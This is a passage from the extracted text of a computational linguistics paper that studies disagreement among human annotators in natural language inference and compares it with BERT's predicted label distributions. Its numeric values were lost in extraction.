present in human disagreements. we discuss implications of our results in relation to the recognizing textual entailment (rte)/natural language inference (nli) task. we argue for a refined evaluation objective that requires models to explicitly capture the full distribution of plausible human judgments. 
introduction entailment is arguably one of the most fun- damental of language understanding tasks, with montague himself calling entailment ‘‘the basic aim of semantics’’ (montague, ). compu- tational work on recognizing textual entailment (rte) (also called natural language inference, or nli) has a long history, ranging from early efforts to model logical phenomena (cooper et al., ), to later statistical methods for modeling practical inferences needed for applications like informa- tion retrieval and extraction (dagan et al., ), to current work on learning common sense hu- man inferences from hundreds of thousands of examples (bowman et al., ; williams et al., ). broadly speaking, the goal of the nli task is to train models to make the inferences that a human would make. currently, ‘‘the inferences that a human would make’’ are determined by asking multiple human raters to label pairs of sentences, and then seeking some consensus among them. for example, having raters choose among discrete labels and taking a majority vote (dagan et al., ; bowman et al., ; williams et al., ), or having raters use a continuous likert scale and taking an average (pavlick and callison-burch, a; zhang et al., ). that is, the prevailing assumption across annotation methods is that there is a single ‘‘true’’ inference about h given p that we should train models to predict, and that this label can be approximated by aggregating multi- ple (possibly noisy) human ratings as is typical in many other labelling tasks (snow et al., ; callison-burch and dredze, ). often, however, we observe large disagree- ments among humans about whether or not h can be inferred from p (see figure ). the goal of this study is to establish whether such disagree- ments can safely be attributed to ‘‘noise’’ in the annotation process (resolvable via aggregation), or rather are a reproducible signal and thus should be treated as part of the nli label assigned to the p/h pair. specifically, our primary contributions are: • we perform a large-scale study of humans’ sentence-level inferences and measure the degree to which observed disagreements persist across samples of annotators. • we show that current state-of-the-art nli systems do not capture this disagreement by default (by virtue of treating nli as probabilistic) and argue that nli evaluation should explicitly incentivize models to pre- dict distributions over human judgments. • we discuss our results with respect to the definition of the nli task, and its increased usage as a diagnostic task for evaluating ‘‘general purpose’’ representations of natural language. c© association for computational linguistics. distributed under a cc-by . license. transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: christopher potts. submission batch: / ; published: / . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://doi.org/ . /tacl_a_ figure : example p/h pair on which humans exhibit strong disagreements about whether h can be inferred from p. here, the disagreement appears to stem from the implicature, but we observe similar disagreements on a variety of linguistic phenomena. the rte/nli task the task of rte/nli is fundamentally concerned with drawing conclusions about the world on the basis of limited information, but specifically in the setting when both the information and the conclusions are expressed in natural language. 
that is, given a proposition p, should one infer some other proposition h to be true? traditionally, in formal linguistics, the defini- tion of entailment used is that defined in formal logic—namely, p entails h if h is true in every possible world in which p is true. this logical definition takes for granted that lexical and con- structional meanings are fixed in such a way that it is possible to fully pre-specify and then repeatedly apply those meanings across all contexts. from the point of view of evaluating nlp systems’ ability to reason about entailment, these are clearly diffi- cult criteria to operationalize. thus, within nlp, we have rarely if ever evaluated directly against this definition. rather, work has been based on the below informal definition: p entails h if, typically, a human reading p would infer that h is most likely true. . . [assuming] common human un- derstanding of language [and] common background knowledge (dagan et al., ). this definition was intended to undergo refine- ment overtime, with dagan et al. ( ) explicitly stating that the definition was ‘‘clearly not mature yet’’ and should evolve in response to observed shortcomings, and, in fact, substantial discussion surrounded the original definition of the rte task. in particular, zaenen et al. ( ) argued that the definition needed to be made more precise, so as to circumscribe the extent to which ‘‘world knowledge’’ should be allowed to factor into in- ferences, and to explicitly differentiate between distinct forms of textual inference (e.g., entailment vs. conventional implicature vs. conversational implicature). manning ( ) made a counter- argument, pushing back against a prescriptivist definition of what types of inferences are or are not licensed in a specific context, instead advocat- ing that annotation tasks should be ‘‘natural’’ for untrained annotators, and that the role of nlp should be to model the inferences that humans make in practical settings (which include not just entailment, but also pragmatic inferences such as implicatures). both supported the use of the term ‘‘inference’’ over ‘‘entailment’’ to acknowledge the divergence between the working nlp task definition and the notion of entailment as used in formal semantics. since the task’s introduction, there has been no formal consensus around which of the two approaches offers the better cost–benefit tradeoff: precise (at risk of being impractical), or organic (at risk of being ill-defined). that said, there has been a clear gravitation toward the latter, apparent in the widespread adoption of inference datasets that explicitly prioritize natural inferences over rigorous annotation guidelines (bowman et al., ; williams et al., ), and in the overall shift to the word ‘‘inference’’ over ‘‘entailment.’’ there has also been significant empirical evidence supporting the argument that humans’ semantic inferences are uncertain and context-sensitive (poesio and artstein, ; versley, ; simons et al., ; recasens et al., ; de marneffe et al., ; passonneau et al., ; pavlick and callison-burch, a,b; tonhauser et al., , among others) suggesting computational models would benefit from focusing on ‘‘speaker meaning’’ over ‘‘sentence meaning’’ when it comes to nli (manning, ; westera and boleda, ). thus, in this paper, we assume that nlp will maintain this hands-off approach to nli, avoiding definitions of what inferences humans should make or which types of knowledge they should invoke. 
we take the position that, ultimately, our we, too, adopt the word ‘‘inference’’ for this reason. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april goal in nlp is to train models that reverse- engineer the inferences a human would make when hearing or reading language in the course of their daily lives, however ad-hoc the process that generates those inferences might be. therefore, our question in this paper is not yet what process humans use to draw inferences from natural lan- guage, but merely: left to their own devices, do humans, in general, tend to follow the same process? note that this question is independent of the decision of whether to treat annotations as discrete versus gradable. even if nli is treated as a gradable phenomenon (as we believe it should be), a world in which all humans share the same notion of uncertainty necessitates very different models, annotation practices, and modes of evaluation than a world in which people may disagree substan- tially in specific situations, use different heuristics, and/or have different preferences about how to resolve uncertainty. specifically, current practices— in which we aggregate human judgments through majority vote/averaging and evaluate models on their ability to predict this aggregated label—are only appropriate if humans all tend to use the same process for resolving uncertainties in practice. nli data and annotation to perform our analysis, we collect nli judg- ments at × redundancy for sentence pairs drawn from a variety of existing nli datasets. our anno- tation procedure is described in detail in this section. all of the data and collected anno- tations are available at https://github. com/epavlick/nli-variation-data. . sentence pairs we draw our p/h pairs from the training sets of each of the following five datasets: rte (dagan et al., ), snli (bowman et al., ), mnli (williams et al., ), joci (zhang et al., ), and dnc (poliak et al., b). table shows randomly sampled positive (p → h) and negative (p �→ h) examples from each. these datasets differ substantially in the procedures used to generate the data, and in the types of inferences they attempt to test. rte consists of premises/hypothesis pairs derived predominantly from the output of information retrieval systems run over newswire text and annotated by experts (researchers in the field). snli consists of premises derived from image captions with hypotheses written and judged by non-expert (crowdsourced) annotators. mnli was constructed in the same way as snli but contains premises drawn from a range of text genres, including letters, fiction, and telephone conversations. joci is intended to target ‘‘com- mon sense’’ inferences, and contains premises drawn from existing nli datasets paired with hypothesis that were automatically generated via either templates or seq seq models and then refined by humans. the dnc consists predomi- nantly of naturally occurring premises paired with template-generated hypotheses, and comprises a number of sub-corpora aimed at testing systems’ understanding of specific linguistic phenomena (e.g., lexical semantics, factuality, named entity recognition). we draw from this variety of data- sets in order to ensure a diversity of types of tex- tual inference and to mitigate the risk that the disagreements we observe are driven by a specific linguistic phenomenon or dataset artifact on which humans’ interpretations particularly differ. we sample p/h pairs from each dataset. 
in every dataset, we limit to pairs in which the premise and the hypothesis are both less than or equal to words, to minimize cognitive load during annotation. we attempt to stratify across expected labels to ensure an interesting balance of inference types. for rte , snli, and mnli, this means stratifying across three categories (entailment/contradiction/neutral). for joci, the p/h pairs are labeled on a five-point likert scale, where denotes that h is ‘‘impossible’’ given p and denotes that h is ‘‘very likely’’ given p, and thus we stratify across these five classes. in the dnc, all sub-corpora consist of binary labels (entailment/non-entailment) but some sub- corpora contain finer-grained labels than others (e.g., three-way or five-way labels). thus, when sampling, we first stratify across sub-corpora and then across the most fine-grained label type available for the given sub-corpus. . annotation we show each p/h pair to independent raters on amazon mechanical turk. we ask them to we skip the subset of joci that was drawn from snli, to avoid redundancy with our own snli sample. we skip two sub-corpora (verbcorner and puns), the former because it contains nonced words and thus is difficult to ask humans to label without some training, and the latter because of the potential for noisy labels due to the fact that some people, bless their hearts, just don’t appreciate puns. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/epavlick/nli-variation-data https://github.com/epavlick/nli-variation-data snli three dogs on a sidewalk. → there are more than one dog here. a red rally car taking a slippery turn in a race. → ¬ the car is stopped at a traffic light. mnli historical heritage is very much the theme at ichidani. → ichidani’s historical heritage is important. okay i uh i have five children all together → ¬ i do not have any children. rte self-sufficiency has been turned into a formal public awareness campaign in san francisco, by mayor gavin newsom. → gavin newsom is a politician of san francisco. the unconfirmed case concerns a rabies-like virus known only in bats → ¬ a case of rabies was confirmed. joci it was charlie ’s first day of work at the new firm → the firm is a business. a young girl is holding her teddy bear while riding a pony . → ¬ the bear attacks. dnc tony bent the rod. → tony caused the bending. when asked about the restaurant, jonah said, ‘sauce was tasteless.’ �→ jonah liked the restaurant. table : examples of p/h pairs from each of our source datasets. the top pair is one labeled by the original dataset as a valid inference (one that should be drawn), the bottom as an invalid inference (either h is contradictory given p (p → ¬h), or h simply cannot be inferred (p �→ h)). for dnc, examples shown are from the verbnet (top) and sentiment (bottom) sub corpora. indicate using a sliding bar, which ranges from − to , how likely it is that h is true given that p is true, where − means that h is definitely not true (p → ¬h), means that h is definitely true (p → h), and means that h is consistent with but not necessarily true given p (p �→ h). raters also have the option to indicate with a checkbox that either/both of the sentences do not make sense and thus no judgment can be made. we attempt to pitch the task intuitively and keep the instructions light, for reasons discussed in section . we provide brief instructions followed by a few examples to situate the task. 
our exact instructions and examples are shown table . raters label pairs in batches of , meaning we have a minimum of ratings per rater. we pay $ . per set of . we restrict to raters who have a % or better approval rating with at least hits approved, and who are located in a country in which english is the native language (us, canada, uk, australia, new zealand). . preprocessing filtering. in total, we had workers complete our hits, with an average of . tasks ( sentence pairs) per worker. we follow the methods from white et al. ( ) and remove workers who demonstrate consistently low correlations with others’ judgments. specifically, for each sentence pair s, for each worker wi, we compute the spearman correlation between wi’s labels and raters do not see specific numbers on the slider. for each pair of sentences, assume that the first sentence (s ) is true, describes a real scenario, or expresses an opinion. using your best judgment, indicate how likely it is that the second sentence (s ) is also true, describes the same scenario, or expresses the same opinion. if either sentence is not interpretable, check the ‘‘does not make sense’’ box. several examples are given below. example : in the below example, the slider is far to the right because we can be very confident that if a person is ‘‘on a beach’’ than that person is ‘‘outside’’. s : a woman is on a beach with her feet in the water. s : the woman is outside. example : in the below example, the slider is far to the left because we can be very confident that if a person is ‘‘on a beach’’ then that person is not ‘‘in her living room’’. s : a woman is on a beach with her feet in the water. s : the woman is in her living room. example : in the below example, the slider is in the center because knowing that woman is on the beach does not give us any information about the color of her hair and so we cannot reasonably make a judgment about whether or not her hair is brown. s : a woman is on a beach with her feet in the water. s : the woman has brown hair. table : instructions and examples shown to raters. raters indicated their responses using a sliding bar which ranged from − to . in the instructions actually shown, the examples were shown alongside a sliding bar reflecting the desired rating. exact ui not shown for compactness. every other wj who labeled s. across all pairs of workers, the mean correlation is . . we consider a pair of workers on a given assignment to be an outlier if the correlation between those workers’ ratings falls outside . times the interquartile downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april range of all the correlations (white et al., ). we find pairs to be outliers, and that they can be attributed to individual workers. we therefore remove all annotations from these workers from our analysis. additionally, we remove ratings from workers who have fewer than useable data points (i.e., judgments not including cases in which they choose the ‘‘does not make sense’’ option), as this will prevent us from properly estimating and thus correcting for their individual annotation bias (described in the following section). finally, we remove p/h pairs that, after removing all problematic workers and ‘‘does not make sense’’ judgments, are left with fewer than judgments. in the end, we have p/h pairs with a mean of labels per pair. normalization. 
one confound that results from collecting annotations on a continuous scale is that each rater may choose to use the scale differently. thus, we apply z-score normalization to each worker’s labels for each assignment, meaning each worker’s ratings are rescaled such that the mean across all labels from a single worker within a single batch is and the standard deviation is . this normalization is not perfect, as every batch has a slightly different set of pairs, and so normalized scores are not comparable across batches. for example, if, by chance, a batch were to contain mostly pairs for which the ‘‘true’’ label was p → h, a score of zero would imply p → h, whereas if a batch were to include mostly pairs for with the ‘‘true’’ label was p → ¬h, zero would correspond to p → ¬h. however, for the purposes of our analysis, this is not problematic; because our interest is comparing disagreements between annotations on each specific p/h pair, it is only important that two worker’s labels on the same pair are comparable, not that judgments across pairs are comparable. results presented throughout are based on data with these workers removed. however, rerunning analysis with these workers included did not affect our overall takeaways. on our own manual inspection, it is nearly always the case that the mean ( ) is roughly interpretable as neutral, with only moderate deviations from one example to the next. nonetheless, when interpreting the figures in the following sections, note that the center of one pair’s distribution is not necessarily comparable to the center of another’s. analysis of human judgments . experimental design we aim to establish whether the disagreements observed between humans’ nli judgments can be attributed to ‘‘noise’’ in the annotation process. we make the assumption that, if the disagreements are attributable to noise, then the observed human judgments can be modeled as a simple gaussian distribution, where the mean is the true label. this model can account for the fact that some cases might be inherently harder than others—this could, for example, be reflected by higher variance— but, overall, the labels are nonetheless in ac- cordance with the assumption that there exists a fundamentally ‘‘true’’ label for each p/h pair which we can faithfully represent via a single label or value, obtainable via aggregation. for each sentence pair, we randomly split the collected human labels into train and test. specifically, we hold out labels from each pair to use as our test set. the training data are composed of the remaining labels, which varies in number from to , depending on how many labels were left for that pair after preprocessing (see section . ). the average number of training labels is . for each sentence pair, we use the training data to fit two models: ) a single gaussian and ) a gaussian mixture model where the number of components is chosen during training, meaning that the model may still choose to fit only one component if appropriate. we compute the log likelihood assigned to the held-out test data under each model, and observe how often, and to what extent, the additional components permitted by the gmm yield a better fit for the held out judgments. if the mixture model frequently choses to use more than one effective component, and if doing so results in a better fit for the held-out data than the unimodal gaussian, we interpret this as evidence that, for many sentence pairs, human judgments exhibit reproducibly multimodal distributions. 
thus, for such sentence pairs, the current practice of aggregating human judgments into a single label would fail to accurately capture the types we use the variational bayesian estimation of a gaussian mixture provided in scikit learn, with the maximum number of components set to be the number of points in the training data: https://scikit-learn.org/stable/modules/ generated/sklearn.mixture.bayesiangaussian mixture.html downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://scikit-learn.org/stable/modules/generated/sklearn.mixture.bayesiangaussianmixture.html https://scikit-learn.org/stable/modules/generated/sklearn.mixture.bayesiangaussianmixture.html https://scikit-learn.org/stable/modules/generated/sklearn.mixture.bayesiangaussianmixture.html figure : log likelihood assigned to test data under the single-component gaussian (x-axis) vs the k- component gmm (y-axis). results show an average over random train/test splits; error bars not shown to reduce clutter. overall, multimodal distributions generalize better to unseen human judgments than do single gaussians. of semantic inferences that humans might make about the given p/h pair. . results are distributions unimodal? figure shows, for each sentence pair, the test log likelihood under the one-component gaussian model versus the k-component gmm. if the data were in fact sampled from an underlying distribution defined by a single gaussian, we would expect the points to be distributed approximately randomly around the y = x line. that is, most of the time the gmm would provide no advantage over the sin- gle gaussian. what we see instead is that the majority of points fall on or above the y = x line, indicating that, when there is a difference, the additional components deemed necessary in training tend to generalize to unseen human judgments. very few points fall below the y = x line, indicating that when models choose to fit multiple components, they are correctly modeling the true data distribution, rather than overfitting the training set. we note that the majority of points fall on y = x, indicating that most examples do exhibit consensus around one ‘‘true’’ label. figure shows, for each sentence pair, the weights of the effective components according the the we verified that, if forced to fit more than one com- ponent, the model often overfits, confirming that these examples are indeed best modeled as unimodal distributions. figure : weights of effective components for each p/h pair. y-axis corresponds to the pairs in our data, sorted by weight of the second component. the figure should be interpreted as follows: when the line is all blue (pair # ), the gmm found a single component with a weight of . when the line contains mixed col- ors, the model found multiple components with the depicted weights (e.g., pair # has two components of equal weight). gmm. we see that for % of the sentence pairs, there is a nontrivial second component (weight > . ), but rarely are there more than two components with significant weights. figure shows several examples of sentences for which the annotations exhibit clear bimodal distributions. these examples show the range of linguistic phenomena that can give rise to un- certainty. in the first example, from snli, there appears to be disagreement about the degree to which two different descriptions could potentially refer to the same scenario. 
in the second example, from dnc and derived from verbnet (chklovski and pantel, ), there is disagreement about the manner aspect of ‘‘swat’’, that is, whether or not ‘‘swatting’’ is necessarily ‘‘forceful’’. in the third example, from dnc and derived from the megaverdicality dataset (white and rawlins, ), there appears to be disagreement about the degree to which ‘‘confess that’’ should be treated as factive. these examples highlight legitimate disagree- ments in semantic interpretations, which can be difficult to control without taking a highly pre- scriptivist approach to annotation. doing so, by corpus, rte exhibits the least variation and joci exhibits the most, though all of the corpora are comparable. we did not see particularly interesting trends when we broke down the analysis by corpus explicitly, so, for brevity, we omit the finer-grained analysis. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : examples of sentence pairs with bi-modal human judgment distributions. examples are drawn from snli, the verbnet portion of dnc, and the megaverdicality portion of dnc (from left to right). training distribution is in blue; test in orange. dotted black line shows the model fit when using a single component; shaded gray shows the model learned when allowed to fit k components. distributions are over z-normalized scores in which roughly corresponds to neutral (p �→ h) but not precisely (§ . ). however, would compromise both the ‘‘natural- ness’’ of the task for annotators and the empiricist approach to representation learning currently de- sired in nlp (as discussed in section ). does context reduce disagreement? one fair objection to these results is that sentence-level inferences are problematic due to the lack of context provided. it is reasonable to believe that the divergences in judgments stem from the fact that, when details of the context are left unspecified, different raters choose to fill in these details differently. this would inevitably lead to different inferences, but would not be reflective of differences in humans’ representations of lin- guistic ‘‘meaning’’ as it pertains to nli. we thus explore whether providing additional context will yield less-divergent human judgments. to do this, we construct a small dataset in which we can collect annotations with varying levels of context, as described next. method. we sample sentences from wikipedia, restricting to sentences that are at least four words long and contain a subject and a verb. we consider each of these sentences to be a candidate premise (p), and generate a corresponding hypothesis (h) by replacing a word w from p with a substitute w , where w has a known lexical semantic re- lationship to w . specifically, we use as set of word pairs: hypernym/hyponym pairs, antonym pairs, and co-hyponym pairs. we chose these categories in order to ensure that our analysis consists of meaningful substitutions and that it covers a variety of types of inference judgments. our hypernyms and antonyms are taken from wordnet (fellbaum, ), with hy- pernyms limited to first-sense immediate hyper- nyms. our co-hyponyms are taken from an internal database, which we constructed by running hearst patterns (hearst, ) over a large text corpus. the word pairs we used are available for inspection at https://github.com/epavlick/nli- variation-data. 
after making the substitution, we score each candidate p and h with a language model (józefowicz et al., ) and disregard pairs for which the perplexity of h is more than points above that of p. this threshold was chosen based on manual inspection of a sample of the output, and is effective at removing sentences in which the substitution yielded a meaningless hypothesis—for example, by replacing a w that was part of a multiword expression. for each resulting p/h pair, we collect ratings at three levels: word level, in which p and h are each a single word; sentence level, in which p and h are each a sentence; and paragraph level, in which p is a full paragraph and h is a sentence (as depicted in figure ). we use the same anno- tation design as described in section . . to quantify the level of disagreement in the observed judgments, we compute two measures: ) variance of observed ratings and ) Δ log likelihood, that is, the change in log likelihood of held out data that results from using a k-component gmm over a single-component gaussian (as described in the previous section). we note that Δ log likelihood is a more direct measure of the type of disagreement in which we are interested in this paper (i.e., disagreements stemming from multimodal distributions of judgments that are downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/epavlick/nli-variation-data https://github.com/epavlick/nli-variation-data figure : distributions of variances (top) and Δ log likelihood (bottom) for human ratings resulting from word, sentence, and paragraph contexts. the average variances of all levels are significantly different at p < . (word < sentence < paragraph). average Δll for words was significantly lower than for sentences and paragraphs, but there is no significant difference between sentences and paragraphs. not well summarized by a single label/value). high variance distributions may correspond to ‘‘difficult’’ cases which are nonetheless still unimodal. results. figure shows the distribution of each metric as a function of the level of context given to raters. the trend is counter to our initial intuition: both measures of disagreement actually increase when raters see more context. on aver- age, we see a variance of . ± . when raters are shown only words, . ± . when raters are shown sentences, and . ± . when rat- ers are given a full paragraph of context ( % con- fidence intervals). the trend for Δ log likelihood is similar: disagreement at the word level ( . ± . ) is significantly lower than at the sentence ( . ± . ) and paragraph ( . ± . ) level, though there is no significant difference in Δ log likelihood between sentence-level and paragraph-level. figure shows an example p/h pair for which additional context increased the variance among annotators. in the example shown, humans are generally in agreement that ‘‘boating’’ may or may not imply ‘‘picknicking’’, when no additional context is given. however, when information is provided which focuses on boating on a specific canal, emphasizing the activities that the water itself is used for, people diverge in their inference judgments, with one group centered around contradiction and a smaller group centered around neutral. we interpret these results as preliminary evi- dence that disagreement is not necessarily control- lable by providing additional context surrounding the annotation (i.e., we do not see evidence that increasing context helps, and it may in fact hurt). 
we hypothesize that, in fact, less context may result in higher agreement due to the fact that humans can more readily call on conventional- ized ‘‘default’’ interpretations. for example, in the case of single words, people likely default downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : in the word case, human judges were shown only the words (bolded); in the sentence case, judges were shown pairs of sentences (gray highlight); in the paragraph case, judges were shown all of the text. judges did not see markup (bold/highlight) when presented the text to judge. gray bars show distribution of z-normalized scores, ticks show raw (unnormalized) scores, bell curves are estimated by the gmm. to reading them as referring expressions for a single entity/event, and thus make judgments con- sistent with the prototypical lexical entailment relations between these words. additional con- text provides increased opportunity for inferences based on pragmatics and world knowledge (e.g., inferences about the question under discussion and the speaker’s intent), which are less likely to follow consistent conventions across all raters. we consider this study exploratory, as there are some confounds. most notably, increasing the amount of context clearly increases cognitive load on annotators, and thus we would expect to see increased variance even if there were no increase in actual interpretive disagreements. however, the increase in the Δ log likelihood metric is more meaningful, because randomly distributed noise (which we might expect in the case of high cog- nitive load/low annotator attention) should lead to higher variance but not multimodality. more work is needed to explore this trend further, and to determine whether increasing context would be a viable and productive means for reducing disagreements on this task. analysis of model predictions . motivation another natural question arising from the analysis presented thus far is whether the phenomenon under investigation even poses a problem for nlp systems at all. that is, whether or not hu- mans’ judgments can be summarized by a single aggregate label or value might be a moot question, since state-of-the-art models do not, in practice, predict a single value but rather a distribution over values. it may be the case that these predicted distributions already reflect the distributions observed in the human judgments and thus that the models can be viewed as already adequately capturing the aspects of semantic uncertainty that cause the observed human disagreements. we thus measure the extent to which the softmax distributions produced by a state-of-the-art nli model trained on the dataset from which the p/h pairs were drawn reflects the same distribution as our observed human judgments. . experimental design data. nli is standardly treated as a classi- fication task. thus, in order to interface with existing nli models, we discretize our collected human judgments by mapping the raw (un- normalized) score (which is between − and ) into k evenly sized bins, where k is equal to the number of classes that were used in the original dataset from which the p/h pair was drawn. specifically, for pairs drawn from datasets which use the three-way entailment/ contradiction/neutral labels (i.e., snli, mnli, and rte ), we consider human scores less than − . to be contradiction, those greater than . to be entailment, and those in between to be neutral. 
for the binary tasks (dnc), we use the same three-way thresholds, but consider scores below . to be nonentailment and those above to be entailment. after some experimentation, we ultimately choose to map the we experimented with multiple variations on this mapping, including using the z-normalized (rather than the raw) human scores, and using bins based on percentiles rather than evenly spaced over the full range. none of these variants noticeably affected the results of our analysis or the conclusions presented in the following section. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april orig./ bert/ bert/ ours orig ours ∩ snli . . . mnli . . . rte . . . dnc . . . joci . . . table : left to right: agreement between datasets’ original labels and the majority label according to our (discretized) re-annotation; accuracy of bert nli model against original labels; accuracy of bert against re-annotation labels; number of p/h pairs (out of ) on which all three label sources (original, re-annotation, model prediction) agree on the most likely label. our analysis in § . is performed only over pairs in ∩. joci scores to a three-way classification scheme as well, rather than the original five-way scheme, using = contradiction, { , , } = neutral, and = entailment. this decision was made after observing that, although our overall results and conclusions remained the same regardless of the way we performed the mapping, the three-way mapping led to higher levels of agreement between the original labels and our newly collected labels, and thus gave the model the best chance of learning the distribution against which it will be tested. agreement between the original labels (i.e., those in the published version of the data) and our discretized newly collected labels are given in the first column of table . we note that measuring agreement and model accuracy in terms of these discrete distributions is not ideal, and it would be preferable to train the model to directly predict the full distributions, but because we do not have sufficient training data to do this (we only collected full distributions for p/h pairs per dataset) we must work in terms of the discrete labels provided by the existing training datasets. model. we use pretrained bert (devlin et al., ), fine-tuned on the training splits of the datasets from which our test data was drawn. that is, we fine-tune bert five times, once on each dataset, and then test each model on the subset of our re-annotated p/h pairs that were drawn from we also try removing joci from our analysis entirely, since it is the noisiest dataset, and still reach the same conclusions from our subsequent analysis. https://github.com/google-research/bert the dataset on which it was fine-tuned. we remove from each training set the p/h pairs that we had re-annotated (i.e., the data we use for testing). we use the bert nli model off-the-shelf, without any changes to architecture, hyperparameters, or training setup. table shows the accuracy of each model on the test set (i.e., our re-annotated sentences) when judged against ) the original (discrete) label for that pair given in the standard version of the dataset (i.e., the same type of label on which the model was trained) and ) our new (discretized) label derived from our re-annotation. table also gives the agreement between the original discrete labels and the discretized re-annotation labels. metrics. 
we want to quantify how well the model’s predicted softmax distribution captures the distribution over possible labels we see when we solicit judgments from a large sample of annotators. to do this, we consider the model softmax to be a basic multinomial distribution, and compute ) the probability of the observed human labels under that multinomial and ) the cross- entropy between the softmax and the observed human distributions. as a point of comparison, we compute the same metrics for a random sample, of equal size to the set of observed labels, drawn from the multinomial defined by the softmax. we focus only on p/h pairs on which all three label sources (i.e., the original label provided by the official dataset, the new label we produce by taking the majority vote of our newly collected, discretized human judgments, and the model’s prediction) agree. that is, because we want to evaluate whether the model captures the distrib- ution (not just the majority class that it was trained to predict) we want to focus only on cases where it at least gets the majority class right. because we want to compare against the full distribution of discretized human labels we collected, we don’t want to consider cases where the majority class according to this distribution disagrees with the majority class according to the model’s training data, since this would unfairly penalize the model. table shows the number of pairs (out of ) on which these three label sources agree, for each dataset. . results overall, the softmax is a poor approximation of the distribution observed across the human downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/google-research/bert cross ent. log prob. exp. . ( . , . ) − . (− . , − . ) obs. . ( . , . ) − . (− . , − . ) table : softmax is not a good estimate of the distribution of human labels. exp. refers to the sim- ilarity values we expect due to random variation (i.e., what we get when we compute against a ran- dom sample drawn from the multinomial defined by the softmax). obs. refers to the similarity values between the softmax distribution and the human distribution. numbers in parentheses give % confidence intervals. results are effectively the same for each of individual corpora, so we report only the aggregate results. judges. the log probability assigned to the ob- servations (i.e., the set of human labels) by the predicted (softmax) multinomial is significantly and substantially lower than the probability that we would expect to be assigned if the observations had been in fact sampled from the predicted distribution. similarly, the cross entropy between the predicted and the observed distribution is significantly higher than what can be attributed to random noise (table ). figure shows some examples of p/h pairs for which the softmax substantially misrepresents the nature of the uncertainty that exists among the human labels, in one case because the model predicts with certainty when humans find the judgment ambiguous (due to the need to resolve an ambiguous co-reference) and in the other because the model suggests ambiguity when humans are in clear consensus. overall, the results indicate that while softmax allows the model to represent uncertainty in the nli task, this uncertainty does not necessarily mimic the uncertainty that exists among humans’ perceptions about which inferences can and cannot be made. 
it is worth noting that the softmax distributions tend to reflect the model’s confidence on the dataset as a whole, rather than uncertainty on individual examples. for example, in the rte dataset, the model nearly always splits probability mass over multiple labels, whereas in snli, the model typically concentrates probability mass onto a single label. this is not surprising behavior, but serves to corroborate the claim that modeling probabilistic entailment via softmax layers does figure : examples of p/h pairs on which the model’s predictions about the distribution (blue) misrepresent the nature of the uncertainty observed among human judgments (orange). in the first example (from rte ) the model assumes ambiguity when humans consider the inference to be unambiguous (cross-ent = . ; pmf = . e- ). in the second example (from snli) the model is certain when humans are actually in disagreement (cross-ent = . ; pmf = . e- ) not correspond to modeling annotator uncertainty about inference judgments on specific items. discussion the results in sections and suggest that ) human nli judgments are not adequately captured by a single aggregate score and ) nli systems trained to predict an aggregate score do not learn human-like models of uncertainty ‘‘for free’’. these takeaways are significant for work in computational semantics and language technology in general primarily because nli has, historically (cooper et al., ; dagan et al., ) as well as presently (white et al., ), been proposed as a means for evaluating a model’s ‘‘intrinsic’’ understanding of language: as originally framed by dagan et al. ( ), nli was proposed as an intermediate task for evaluating whether a model will be useful in applications, and currently, nli is increasingly used as a means for ‘‘probing’’ neural models to assess their knowledge of arbitrary linguistic phenomena (dasgupta et al., ; ettinger et al., ; poliak et al., b; white et al., ; poliak et al., a; mccoy et al., ). in other words, nli has largely become an evalu- ation lingua franca through which we diagnose what a semantic representation knows. with the increased interest in ‘‘general-purpose’’, ‘‘task downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april independent’’ semantic representations, , it is particularly important that intrinsic evaluations are reliable, if comparison of such representations are to be meaningful. as discussed, the preference among many in nlp (the authors included) is to avoid tasks which take a prescriptivist approach to language and meaning. instead, we attempt to design tasks which capture humans’ linguistic behavior in as natural a setting as possible (acknowledging that truly natural annotation is difficult) with the hope that models trained to perform such tasks will be the best match for the ‘‘real world’’ settings in which we hope to deploy them. that is, we generally prefer to punt on precise definitions, and instead train our models to ‘‘do what humans do’’. in this paper, we have shown that defining ‘‘what humans do’’ is not straightforward, as humans do not necessarily handle ambiguity or communi- cate uncertainty in the same way as one another. 
thus, as was the case for pipelined systems (zadrozny and elkan, ; finkel et al., ; bunescu, ) and related discussions of model calibration (kuleshov and liang, ), we argue that the best approach is to propagate uncertainty downstream, so that end tasks can decide if and how to handle inferences on which humans are likely to disagree. from the point of view of current neural nli models—and the sentence encoders on top of which they are built—this means that a representation should be evaluated in terms of its ability to predict the full distribution of human inferences (e.g., by reporting cross- entropy against a distribution of human ratings), rather than to predict a single aggregate score (e.g., by reporting accuracy against a discrete ma- jority label or correlation with a mean score). we have shown that models that are trained to predict an aggregate score do not, by default, model the same type of uncertainty as that which is captured by distributions over many human raters’ judgments. thus, several challenges would need to be overcome to switch to the proposed nli evaluation. first, nli evaluation sets would need to be annotated by sufficiently many raters such that we can have an accurate estimate of the distribution against which to evaluate. although the data collected for the purposes of this paper https://www.clsp.jhu.edu/workshops/ - workshop/general-purpose-sentence- representation-learning/ https://repeval .github.io could serve as a start towards this end, a larger effort to augment or replace existing evaluation sets with full distributions of judgments would be necessary in order to yield a meaningful redefinition of the nli task. second, changes would be required to enable models to learn to predict these distributions. one approach could be to annotate training data, not just evaluation data, with full distributions, and optimize for the objective directly. this would clearly incur additional costs, but could be overcome with more creative crowdsourcing techniques (dumitrache et al., ; poesio et al., ). however, re- quiring direct supervision of full distributions is arguably an unsatisfying solution: rarely if ever do humans witness multiple people responding to identical stimuli. rather, more plausibly, we form generalizations about the linguistic phenomena that give rise to uncertainty on the basis of a large number of singly labeled examples. thus, ideally, progress can be made by developing new 